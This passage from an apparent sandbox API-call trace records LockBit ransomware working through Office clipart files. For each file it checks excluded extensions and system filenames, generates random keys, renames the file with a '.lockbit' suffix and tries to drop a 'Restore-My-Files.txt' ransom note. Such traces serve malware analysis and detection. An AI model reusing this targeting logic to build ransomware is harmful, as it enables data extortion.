(lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.454] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00531_.WMF.lockbit") returned 72 [0166.454] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00531_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00531_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0166.458] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.459] malloc (_Size=0x40068) returned 0x1ff1e60 [0166.459] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7908) returned 1 [0166.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.459] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0166.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0166.460] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.462] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00531_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00531_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.462] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.462] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.464] free (_Block=0x1fa2ed8) [0166.464] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00531_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.464] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.464] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.464] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33585700, ftCreationTime.dwHighDateTime=0x1bf3bda, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x33585700, ftLastWriteTime.dwHighDateTime=0x1bf3bda, nFileSizeHigh=0x0, nFileSizeLow=0x8da8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00542_.WMF", cAlternateFileName="")) returned 1 [0166.464] lstrcmpiW (lpString1=".", lpString2="PE00542_.WMF") returned -1 [0166.464] lstrcmpiW (lpString1="..", lpString2="PE00542_.WMF") returned -1 [0166.464] PathFindExtensionW (pszPath="PE00542_.WMF") returned=".WMF" [0166.464] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.464] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.465] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.465] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.466] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00542_.WMF") returned 1 [0166.466] lstrcmpiW (lpString1="ntldr", lpString2="PE00542_.WMF") returned -1 [0166.466] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00542_.WMF") returned -1 [0166.466] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00542_.WMF") returned -1 [0166.466] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00542_.WMF") returned -1 [0166.466] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00542_.WMF") returned 1 [0166.466] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00542_.WMF") returned -1 [0166.466] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.466] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF") returned=".WMF" [0166.466] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.467] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.467] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.468] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.468] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.468] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.468] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.468] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.468] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF.lockbit") returned 72 [0166.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00542_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0166.469] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.469] malloc (_Size=0x40068) returned 0x3d70450 [0166.469] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=36264) returned 1 [0166.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0166.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0166.470] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0166.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.488] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.490] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.493] free (_Block=0x1fa2ed8) [0166.493] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.493] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.493] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b853b00, ftCreationTime.dwHighDateTime=0x1bd4b14, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b853b00, ftLastWriteTime.dwHighDateTime=0x1bd4b14, nFileSizeHigh=0x0, nFileSizeLow=0x140c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00555_.WMF", cAlternateFileName="")) returned 1 [0166.494] lstrcmpiW (lpString1=".", lpString2="PE00555_.WMF") returned -1 [0166.494] lstrcmpiW (lpString1="..", lpString2="PE00555_.WMF") returned -1 [0166.494] PathFindExtensionW (pszPath="PE00555_.WMF") returned=".WMF" [0166.495] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.495] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.496] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.497] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.497] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.498] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.504] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.504] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.504] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.504] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.504] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.504] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.504] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00555_.WMF") returned 1 [0166.504] lstrcmpiW (lpString1="ntldr", lpString2="PE00555_.WMF") returned -1 [0166.504] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00555_.WMF") returned -1 [0166.504] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00555_.WMF") returned -1 [0166.504] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00555_.WMF") returned -1 [0166.506] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00555_.WMF") returned 1 [0166.506] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00555_.WMF") returned -1 [0166.506] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.506] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00555_.WMF") returned=".WMF" [0166.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.507] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.507] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.507] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.507] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.507] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.507] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.507] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.508] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.511] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.511] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00555_.WMF.lockbit") returned 72 [0166.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00555_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00555_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.512] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.512] malloc (_Size=0x40068) returned 0x3df0008 [0166.512] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5132) returned 1 [0166.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.513] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.517] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00555_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00555_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.517] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.517] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.518] free (_Block=0x1fa2ed8) [0166.518] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00555_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.518] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.518] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.518] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30066900, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x30066900, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x26b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00559_.WMF", cAlternateFileName="")) returned 1 [0166.518] lstrcmpiW (lpString1=".", lpString2="PE00559_.WMF") returned -1 [0166.518] lstrcmpiW (lpString1="..", lpString2="PE00559_.WMF") returned -1 [0166.518] PathFindExtensionW (pszPath="PE00559_.WMF") returned=".WMF" [0166.518] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.518] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.519] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".msc", 